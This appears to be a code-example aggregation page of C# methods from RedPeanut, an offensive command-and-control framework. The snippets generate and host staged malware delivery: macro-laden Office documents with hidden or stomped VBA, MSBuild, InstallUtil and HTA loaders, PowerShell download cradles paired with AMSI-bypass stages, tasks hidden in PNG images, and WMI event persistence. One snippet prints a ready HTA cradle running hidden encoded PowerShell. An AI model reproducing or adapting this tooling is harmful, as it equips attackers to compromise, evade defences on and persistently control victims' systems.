Пример #1
0
        static void Execute(string serverkey)
        {
            PrintBanner();

            c2m = new C2Manager();
            c2m.CreateC2Server(serverkey);
            CheckConfiguredListeners(c2m.GetC2Server());

            int defaulthttpprofile = c2m.GetC2Server().GetDefaultProfile();

            if (defaulthttpprofile != 0)
            {
                do
                {
                    if (Menustack.Count == 0)
                    {
                        Menustack.Push(new RedPeanutManager(serverkey));
                    }
                    Menustack.Peek().Execute();
                } while (true);
            }
            else
            {
                Console.WriteLine("[x] Error loading profiles");
            }
        }
Пример #2
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        //Building agent
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                        string outfilename = RandomAString(10, new Random()) + ".dll";
                        Builder.GenerateDll(source, outfilename, 35);

                        //Add resource to webserver
                        C2Manager c2manager = Program.GetC2Manager();
                        c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }

                        string resourcepath = uricontent + outfilename;

                        //Build shooter assembly
                        source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                        source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                        VBAGenerator gen = new VBAGenerator(assemblyBase64, null);

                        //Write file to dest dir
                        string destdir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER);
                        File.WriteAllText(Path.Combine(destdir, filename), gen.GetScriptText());
                        Console.WriteLine("[*] {0} Created", Path.Combine(destdir, filename));
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
Пример #3
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, filename);

                        byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));

                        Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
                        msbuildargs.Add("#{taskname}", taskname);

                        MSBuildGenerator gen = new MSBuildGenerator(agentCompBase64, msbuildargs);

                        if (hosted)
                        {
                            //Add resource to webserver storage
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                            Console.WriteLine("[*] Resource added to webserver resources");
                            return;
                        }
                        else
                        {
                            //Write file to tmp env dir
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
Пример #4
0
        private string CreateTaskMgs(IAgentInstance agent, TaskMsg task)
        {
            AesManaged  aes     = agent.AesManager;
            HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(Profileid);

            string mesg;

            if (profile.HtmlCovered)
            {
                string folderrpath       = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                string outputfolderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER);
                string htmlsource        = System.IO.File.ReadAllText(Path.Combine(folderrpath, HTML_TEMPLATE));

                int elements = htmlsource.Split("targetclass").Length - 1;
                if (elements <= 0)
                {
                    return("");
                }

                string[] images       = ListImages();
                Random   random       = new Random();
                int      payloadindex = random.Next(1, elements);

                //Create Image with task embedded
                string taskmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
                taskmsg = Convert.ToBase64String(EncryptAesMessage(taskmsg, aes));
                string outputfilename = RandomAString(10, random) + ".png";
                string outfullpath    = Path.Combine(outputfolderrpath, outputfilename);
                string imagepath      = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, IMAGELOAD_FOLDER, "images", images[payloadindex - 1]);
                ImageGenerator.Create(Encoding.Default.GetBytes(taskmsg), imagepath, outfullpath);

                //Add Image to resources
                C2Manager c2manager = Program.GetC2Manager();
                c2manager.GetC2Server().RegisterWebResource(outputfilename, new WebResourceInstance(null, outputfilename));

                //Create html page
                htmlsource = Replacer.ReplaceHtmlProfile(htmlsource, profile.TargetClass, Encoding.Default.GetBytes(taskmsg).Length, outputfilename, elements, payloadindex, images);

                return(htmlsource);
            }
            else
            {
                string tasknmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
                mesg = Convert.ToBase64String(EncryptAesMessage(tasknmsg, aes));
                return(mesg);
            }
        }
Пример #5
0
        static void MainMenu(string input)
        {
            if (!string.IsNullOrEmpty(input))
            {
                if (mainmenu.ContainsKey(input))
                {
                    switch (input)
                    {
                    case "launcher":
                        if (launcherm == null)
                        {
                            launcherm = new LauncherManager(null);
                        }
                        Program.GetMenuStack().Push(launcherm);
                        exit = true;
                        break;

                    case "c2":
                        if (c2m == null)
                        {
                            c2m = new C2Manager();
                        }
                        Program.GetMenuStack().Push(c2m);
                        exit = true;
                        break;

                    case "list":
                        PrintOptions("Modules availlable", mainmenu);
                        break;

                    case "exit":
                        exit = true;
                        Console.WriteLine("See you soon");
                        ShutDown();
                        return;

                    default:
                        break;
                    }
                }
                else
                {
                    PrintOptionsNoStd("Command not found", mainmenu);
                }
            }
        }
Пример #6
0
        private void Run()
        {
            try
            {
                if (!string.IsNullOrEmpty(targetfile))
                {
                    string filetowork = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER, targetfile);

                    if (!File.Exists(filetowork))
                    {
                        Console.WriteLine("[x] File not found {0}", filetowork);
                        return;
                    }

                    string vbasrc = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER, sourcefile);
                    if (!string.IsNullOrEmpty(sourcefile))
                    {
                        if (!File.Exists(vbasrc))
                        {
                            Console.WriteLine("[x] VBA source not found {0}", vbasrc);
                        }
                    }

                    try
                    {
                        MSOfficeManipulator mSOfficeManipulator = new MSOfficeManipulator(filetowork, names.Split(' '));

                        List <string> args = new List <string>();

                        if (!string.IsNullOrEmpty(targetversion))
                        {
                            mSOfficeManipulator.SetTargetOfficeVersion(targetversion);
                        }
                        if (unviewableVBA)
                        {
                            mSOfficeManipulator.UnviewableVBA();
                        }
                        if (viewableVBA)
                        {
                            mSOfficeManipulator.ViewableVBA();
                        }
                        if (guihide)
                        {
                            mSOfficeManipulator.HideInGUI();
                        }
                        if (guiunhide)
                        {
                            mSOfficeManipulator.UnhideInGUI();
                        }

                        if (!string.IsNullOrEmpty(sourcefile))
                        {
                            mSOfficeManipulator.StompVBAModules(vbasrc);
                        }

                        if (randomnames)
                        {
                            mSOfficeManipulator.SetRandomNames();
                        }
                        if (resetmodulenames)
                        {
                            mSOfficeManipulator.ResetModuleNames();
                        }
                        if (delmetadata)
                        {
                            mSOfficeManipulator.DeleteMetadata();
                        }

                        string outputfile = Path.GetFileName(mSOfficeManipulator.Commit());
                        Console.WriteLine("[*] Output file {0}", outputfile);
                        //Add resource to webserver if required
                        if (hosted)
                        {
                            //Add resource to webserver storage
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(outputfile, new WebResourceInstance(null, outputfile));

                            Console.WriteLine("[*] File added to webserver resources /office/{0}", outputfile);
                        }
                    }
                    catch (Exception)
                    {
                        return;
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
Пример #7
0
        private void Run()
        {
            try
            {
                List <string> args = new List <string>();
                if (!string.IsNullOrEmpty(processname) && !string.IsNullOrEmpty(eventname))
                {
                    //Create webresource
                    //Register web resource

                    string         folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    string         filename    = RandomAString(10, new Random()).ToLower();
                    ListenerConfig conf        = new ListenerConfig("",
                                                                    ((AgentInstanceHttp)agent).GetAddress(),
                                                                    ((AgentInstanceHttp)agent).GetPort(),
                                                                    Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()),
                                                                    ((AgentInstanceHttp)agent).GetProfileid());

                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                    string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll");

                    byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                    string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                    Dictionary <string, string> argagent = new Dictionary <string, string>();
                    argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                    string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri;

                    uricontent = uricontent.TrimStart('/');

                    if (!uricontent.EndsWith("/"))
                    {
                        uricontent += "/";
                    }

                    Dictionary <string, string> arg = new Dictionary <string, string>
                    {
                        { "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() },
                        { "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() },
                        { "#{uri}", uricontent + "s2_" + filename + ".ps1" }
                    };

                    PowershellAmsiGenerator  gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                    PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                    //Add resource to webserver storage
                    C2Manager c2manager = Program.GetC2Manager();

                    c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1"));
                    c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1"));
                    Console.WriteLine("[*] Resource added to webserver resources");

                    string proto = "";

                    if (ssl)
                    {
                        proto = "https";
                    }
                    else
                    {
                        proto = "http";
                    }

                    string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1");

                    string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSWMI_TEMPLATE));

                    perssrc = Replacer.ReplacePersWMI(perssrc, eventname, url, processname, encoded);

                    RunAssemblyBase64(
                        Convert.ToBase64String(
                            CompressGZipAssembly(
                                Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.Persistence)
                                )
                            ),
                        "PersWMI",
                        new string[] { " " },
                        agent);

                    return;
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[x] Error generating task {0}", e.Message);
            }
        }
Пример #8
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    if (lang == "vbs")
                    {
                        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                        {
                            //Building agent
                            ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                            string outfilename = RandomAString(10, new Random()) + ".dll";
                            Builder.GenerateDll(source, outfilename, 35);

                            //Add resource to webserver
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                            if (!uricontent.EndsWith("/"))
                            {
                                uricontent += "/";
                            }

                            string resourcepath = uricontent + outfilename;

                            //Build shooter assembly
                            source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                            source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                            string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                            HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);

                            if (hosted)
                            {
                                //Add resource to webserver storage
                                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                Console.WriteLine("[*] Resource added to webserver resources");
                                Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                return;
                            }
                            else
                            {
                                //Write file to tmp env dir
                                File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            }
                        }
                    }
                    else
                    {
                        if (lang == "powershell")
                        {
                            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                            {
                                string         psfilename = RandomString(10, new Random()) + ".ps1";
                                ListenerConfig conf       = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                                string         source     = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                                string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll");

                                Dictionary <string, string> arg = new Dictionary <string, string>();
                                arg.Add("#{lhost}", lhost);
                                arg.Add("#{lport}", lport.ToString());

                                string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                                uricontent = uricontent.TrimStart('/');

                                if (!uricontent.EndsWith("/"))
                                {
                                    uricontent += "/";
                                }

                                arg.Add("#{uri}", uricontent + "s2_" + psfilename);

                                byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                                string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                                Dictionary <string, string> argagent = new Dictionary <string, string>();
                                argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                                PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                                PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                                PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                                HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);

                                if (hosted)
                                {
                                    //Add resource to webserver storage
                                    C2Manager c2manager = Program.GetC2Manager();

                                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                    c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
                                    c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename));
                                    Console.WriteLine("[*] Resource added to webserver resources");
                                    Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                    return;
                                }
                                else
                                {
                                    //Write file to tmp env dir
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText());

                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename));
                                }
                            }
                        }
                        else
                        {
                            Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
                            return;
                        }
                    }
                }
            }catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
Пример #9
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, filename);

                        Dictionary <string, string> arg = new Dictionary <string, string>();
                        arg.Add("#{lhost}", lhost);
                        arg.Add("#{lport}", lport.ToString());

                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                        uricontent = uricontent.TrimStart('/');

                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }

                        arg.Add("#{uri}", uricontent + "s2_" + filename);

                        byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                        Dictionary <string, string> argagent = new Dictionary <string, string>();
                        argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                        PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                        PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                        PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                        if (hosted)
                        {
                            //Add resource to webserver storage
                            C2Manager c2manager = Program.GetC2Manager();

                            c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename));
                            c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename));
                            Console.WriteLine("[*] Resource added to webserver resources");
                            Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                            Console.WriteLine("[*]");
                            Console.WriteLine("[*] Cradle example");
                            Console.WriteLine("[*]");
                            Console.WriteLine("<script language = \"VBScript\">");
                            Console.WriteLine("    Function etaget()");
                            Console.WriteLine("");
                            Console.WriteLine("        Dim ahsten");
                            Console.WriteLine("        Set ahsten = CreateObject(\"Wscript.Shell\")");
                            Console.WriteLine("        ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText());
                            Console.WriteLine("    End Function");
                            Console.WriteLine("");
                            Console.WriteLine("    etaget");
                            Console.WriteLine("    self.close");
                            Console.WriteLine("</script>");
                            Console.WriteLine("[*]");
                            return;
                        }
                        else
                        {
                            //Write file to tmp env dir
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText());
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText());

                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename));
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
Пример #10
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, "tmp_" + filename);

                        byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));

                        string sourceinstallutil = File.ReadAllText(Path.Combine(folderrpath, INSTALLUTIL_TEMPLATE))
                                                   .Replace("#{assembly}", agentCompBase64);

                        Builder.GenerateExe(sourceinstallutil, filename);

                        if (File.Exists(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)))
                        {
                            if (hosted)
                            {
                                //Add resource to webserver storage
                                C2Manager c2manager = Program.GetC2Manager();
                                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(null, filename));

                                Console.WriteLine("[*] Resource added to webserver resources");
                                return;
                            }
                            else
                            {
                                //Write file to tmp env dir
                                File.WriteAllBytes(Path.Combine(Path.GetTempPath(), filename),
                                                   File.ReadAllBytes(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)));

                                Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            }
                        }
                        else
                        {
                            Console.WriteLine("[x] Error creating IndtallUtil dll");
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }